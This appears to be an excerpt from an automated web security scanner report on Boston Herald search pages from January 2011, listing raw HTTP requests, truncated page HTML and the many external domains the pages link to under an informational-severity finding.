Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26srvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
<a id="trackMainImage_href" href="/news/politics/view.bg?articleid=1312665">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo." alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo.">
</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.297. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/search/?topic=Boston&searchSite=recent&srvc=home

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DBoston%26searchSite%3Drecent%26srvc%3Dhome&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110123/stp/7de6bf_walk_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110123/stp/82de90_vamp_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110123/stp/ccc6fe_josh_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110123/stp/d5e151_henry_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/08bb48_court_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/2dc50c_sav_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/439ffc_ltpColdpeopleA012411.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/470a99_shaq_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/7a4442_f21bb4_Mccarthy_01232011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/8ba7b4_raji_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/97d735_coff_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/9d98c9_drill_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/a0920e_amy_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/a26b54_home_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/c9d99f_pedroia012411.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/f00c74_bike_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/f6fd9b_ltpBikesceneA012411.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/fc0641_031610cahillmg01.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/052e14_glover_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/07fb8b_vertex_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/0f1e24_ltp012411homelessms01.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/151c52_012511chuckjw02.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/1c641f_Perk_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/363d09_wwelker012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/4ea241_music_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/5a949a_tresca_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/6e56b2_ltp092309turnerar01.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/795144_cuban.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/8f4487_mark_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/9162c9_Snow_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/a3a915_evac_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/a6cabb_ltpOscParty012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/a9f2ba_Bully_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/c7e9f8_newkids_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/d0449c_Oscar_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/d33d45_jayl_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/d91058_Mark_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/00664e_Joey_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/0537a7_mainturner01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/178947_Stone_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/198eb7_Beck_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/1b8242_ltpCoakley012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/1b9563_ltp012611trafficms03.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/273dac_cold_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/28638a_wanda_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/4149d9_eyes_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/47a00e_101310coakleyjw03.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/5dcfeb_snow_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/65f3c2_ltp012611goldklank.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/6d397f_beer012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/76f960_ltpBaldelli012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/7ca1bb_jmayo01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/80ecf9_Firth_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/a12817_turnerb01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/a15610_Betty_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/a89591_rburton012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/b6a06e_7b20bc_duff.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/ba11ad_fire012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/be6d4c_cheese012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/c37e4b_plant_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/c9896f_fire.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/d89094_Fame_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/e6a29c_Looch_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/ed4fba_tyler_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/f4d76a_curl_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/f812e5_Chandler_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/fcb802_ltpradar118.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/15ce9a_ltp012611broomball.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/39b0d8_garden_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/4b6f72_traff_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/55e63c_ltp101310coakleyjw01.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/6a0551_ltpherzlich.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/834ba8_ltp012711bryanar02.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/89502e_glasses012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/957420_ltpnight.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a5988c_Martin_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a70c6e_cavs012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/afa299_sreynolds012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bedbbe_ltp012611seductive.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/c3e090_ltpThomasgoalie012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/cf9ea2_weather012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/d586cd_Coakley_10172009.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/d675c2_Gold_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/e017a9_ltp012711collapsemg07.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/edc277_ltpLynncar012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/f09506_raji012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/ff6b66_ronson_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110128/889a86_ltpBlatum012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/09191d_ltpChromeo012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/164330_Hot_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG
http://multimedia.heraldinteractive.com/images/20110128/stp/2597e5_ltpBikramA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/288822_ltpManicure012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/550ed9_BC_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/6819c5_ltpYogaA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/889a86_ltpBlatum012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8a420e_ltpSteamB012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/afacc0_ltpOMD012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/b95680_Sing_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/bb4051_Banditas_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/c1e423_ltpSteam012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/scores/live/scoreboard.aspx?date=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Boston&searchSite=recent&srvc=home HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:06:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DBoston%26searchSite%3Drecent%26srvc%3Dhome&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</a>  
+ <a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/scores/live/scoreboard.aspx?date=">Boston Celtics Schedule</a>  
+ <a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Boston Bruins Schedule</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/regional/view.bg?articleid=1312542&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1312571&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312694&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312654&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif" alt="Poll" style="margin:0 2px 0 0;"><a href="/business/general/view.bg?articleid=1312531">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/letters/view.bg?articleid=1312569&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/business/real_estate/view.bg?articleid=1312639&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/columnists/view.bg?articleid=1312540&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/opinion/editorials/view.bg?articleid=1312510&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/sports/basketball/other_nba/view.bg?articleid=1312671">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/889a86_ltpBlatum012811.jpg" title="The Celtics’ Rajon Rondo (9) drives around the Trail Blazers’ Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore." alt="The Celtics’ Rajon Rondo (9) drives around the Trail Blazers’ Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore.">
</a>
...[SNIP]...
id=1312671" title="Blazers F Nicolas Batum has clear MRI on left knee"
onclick="switchPhoto('198224');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198224" src="http://multimedia.heraldinteractive.com/images/20110128/stp/889a86_ltpBlatum012811.jpg" title="The Celtics’ Rajon Rondo (9) drives around the Trail Blazers’ Nicolas Batum (88) in the first quarter during an NBA basketball game Thursday, Jan. 27, 2011, in Portland, Ore."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
654" title="Mitt Romney ‘catches up’ with Boston GOP pols"
onclick="switchPhoto('198222');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
